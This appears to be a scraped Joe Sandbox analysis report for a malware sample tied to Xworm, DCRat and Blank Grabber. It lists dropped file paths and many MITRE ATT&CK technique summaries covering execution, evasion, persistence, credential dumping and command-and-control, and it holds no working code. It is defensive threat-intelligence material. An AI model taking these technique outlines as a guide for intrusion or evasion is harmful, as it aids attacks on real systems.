Opcode Fuzzy Hash: d8f1403e245d045f38b390a45c4b641d8a6c687bfb45a596cbfa23fc90e96f19
Instruction Fuzzy Hash: A7F065719093449FCB01DFB4D906BDC7BB4EB05314F514995DC499B262E7301E05D751

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Vjy8d2EoqK.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Threatname: DCRat

Threatname: Blank Grabber

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Brokercrt\18607e77f76bf7

C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe

C:\Brokercrt\comReviewsession.exe

C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe

C:\Brokercrt\oqZ1ERFvWaUzYBP9Lou79Kq.bat

C:\Program Files (x86)\jDownloader\18607e77f76bf7

Windows Analysis Report
Vjy8d2EoqK.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre